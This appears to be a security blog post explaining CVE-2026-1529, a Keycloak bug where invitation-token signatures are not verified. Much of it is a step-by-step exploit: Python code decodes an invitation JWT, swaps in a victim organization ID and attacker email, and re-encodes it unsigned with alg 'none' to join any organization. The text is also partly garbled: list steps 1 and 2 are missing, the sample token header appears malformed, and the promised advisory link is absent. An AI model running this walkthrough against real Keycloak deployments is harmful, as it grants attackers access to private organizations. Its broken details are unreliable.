Recently, a security flaw was discovered in Keycloak, the popular open-source Identity and Access Management solution. This vulnerability, tracked as CVE-2026-1529, could let an attacker join any organization by tampering with invitation tokens. If your organization uses Keycloak invitations for onboarding users, understanding—and fixing—this vulnerability is critical.

In this post, we break down how the bug works, show how an attacker might exploit it, provide sample code, and point you to Keycloak's relevant updates. Let’s dive in.

What is Keycloak Invitation Token?

Keycloak invitation tokens let organizations send a secure, one-time link to invite people to their groups or platforms. Typically, a JSON Web Token (JWT) carries info like the Organization ID and the recipient’s email address. This JWT is supposed to be tamper-evident thanks to cryptographic signatures—if anyone changes its contents, Keycloak should reject it.

The Flaw: Where Things Went Wrong

CVE-2026-1529 arises because Keycloak failed to verify JWT signatures on invitation tokens in some parts of its code. As a result, an attacker could:

Decode the token, modify the organization ID and email address inside the payload.

3. Re-encode the token *without* needing the signing key, and use it to register as a new user in _any_ organization.

Why Is This So Dangerous?

This completely undermines Keycloak’s trust model: anyone with a valid invitation token can now join any organization, possibly gaining access to private resources, internal communication, or sensitive data.

Say you sign up for a public beta and receive an email like

https://keycloak.example.com/auth/invitation?invitation=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn.eyJvcmdJRCI6IjEyMzQ1IiwiZW1haWwiOiJhdHRhY2tlckBleGFtcGxlLmNvbSJ9.

Use an online tool (like jwt.io or python). Let's break it

import base64
import json

token = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn.eyJvcmdJRCI6IjEyMzQ1IiwiZW1haWwiOiJhdHRhY2tlckBleGFtcGxlLmNvbSJ9.'
header, payload, signature = token.split('.')

payload_json = base64.urlsafe_b64decode(payload + "==")
print(json.loads(payload_json))

You get something like

{
  "orgID": "12345",
  "email": "attacker@example.com"
}

3. Modify & Re-Encode the Payload

Let's change the orgID to another target organization and the email to something under attacker’s control:

payload_data = {
  "orgID": "90001",                  # target org ID (victim)
  "email": "eviluser@evilmail.com"   # attacker's email
}
modified_payload = base64.urlsafe_b64encode(json.dumps(payload_data).encode()).decode().rstrip('=')

The new JWT becomes

<original header>.<modified payload>.

Example

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn.eyJvcmdJRCI6IjkwMDAxIiwiZW1haWwiOiJldmlsdXNlckBldmlsbWFpbC5jb20ifQ.

Notice alg is none—no signature enforcement.

4. Use the Modified Token

Submit the altered invitation token in a registration form—or visit the invitation URL with the new token. Due to the bug, Keycloak skips signature verification, lets you register, and you’re inside the target organization.

How To Protect Your Organization

Keycloak Fix Available:
The Keycloak team has addressed this in recent versions. Ensure that cryptographic signature verification is enforced on _all_ JWTs, especially invitation tokens. Here’s their official advisory with patched releases.

Reference Materials

- Keycloak Security Notices
- JSON Web Token (JWT) Debugger
- CVE-2026-1529 NVD Entry (once published)

Conclusion

CVE-2026-1529 serves as a stark reminder of the importance of signature verification in authentication flows. If you use Keycloak’s invitation system, patch now and review your setup. Don’t give attackers an open door—make sure your identity system does its job securely.

Timeline

Published on: 02/09/2026 18:36:15 UTC
Last modified on: 02/10/2026 12:40:29 UTC